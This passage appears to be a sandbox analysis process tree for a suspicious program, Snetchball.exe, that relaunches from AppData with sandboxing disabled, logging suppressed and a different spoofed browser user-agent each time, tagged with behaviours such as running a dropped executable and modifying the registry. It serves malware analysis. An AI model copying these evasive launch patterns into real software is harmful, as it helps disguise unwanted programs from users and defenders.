C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2728,11684591958910206777,16695886110250067651,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 /prefetch:215⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2728,11684591958910206777,16695886110250067651,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 /prefetch:815⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2728,11684591958910206777,16695886110250067651,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:115⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2848,11632107300355285355,4173813756744281303,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.167 YaBrowser/22.7.4.957 Yowser/2.5 Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 /prefetch:217⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,11632107300355285355,4173813756744281303,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.167 YaBrowser/22.7.4.957 Yowser/2.5 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:117⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2872,7264024172170132715,15312227009764169712,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 8.0; Galaxy Nexus Build/IMM76B; UCBrowser; ru-UA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 YaBrowser/21.2.6.68 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2908 /prefetch:219⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2872,7264024172170132715,15312227009764169712,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 8.0; Galaxy Nexus Build/IMM76B; UCBrowser; ru-UA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 YaBrowser/21.2.6.68 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3152 /prefetch:819⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2872,7264024172170132715,15312227009764169712,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 8.0; Galaxy Nexus Build/IMM76B; UCBrowser; ru-UA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 YaBrowser/21.2.6.68 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:119⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2852,15955737643096916512,1540399912550750019,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2904 /prefetch:221⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2852,15955737643096916512,1540399912550750019,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 /prefetch:821⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2852,15955737643096916512,1540399912550750019,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:121⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2756,16605724862147668351,8184303886034974654,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2904 /prefetch:223⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2756,16605724862147668351,8184303886034974654,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3144 /prefetch:823⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2756,16605724862147668351,8184303886034974654,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:123⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2856,3956465883134394956,5043585880306443708,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2884 /prefetch:225⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2856,3956465883134394956,5043585880306443708,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:125⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2860,15899929388945168781,7419223888666148994,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2904 /prefetch:227⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2860,15899929388945168781,7419223888666148994,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3196 /prefetch:827⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2860,15899929388945168781,7419223888666148994,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:127⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2840,14858862295879299685,17295636674637847351,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.105 Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2868 /prefetch:229⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2840,14858862295879299685,17295636674637847351,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.105 Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3224 /prefetch:829⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2840,14858862295879299685,17295636674637847351,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.105 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:129⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2872,8897377371215448603,14463100497325208262,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4476.0 Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2904 /prefetch:231⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2872,8897377371215448603,14463100497325208262,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4476.0 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:131⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2836,14059417961094652827,18027198836368525221,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 /prefetch:233⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2836,14059417961094652827,18027198836368525221,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:133⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2880,17914812311879297345,6599801019387025352,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2908 /prefetch:235⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2880,17914812311879297345,6599801019387025352,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:135⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2724,7541734360235849457,10510411150285218548,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; U; Android 10; PPA-LX2 Build/HUAWEIPPA-LX2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile Safari/537.36 OPR/63.0.2254.62316" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 /prefetch:237⤵
- Modifies registry class
-
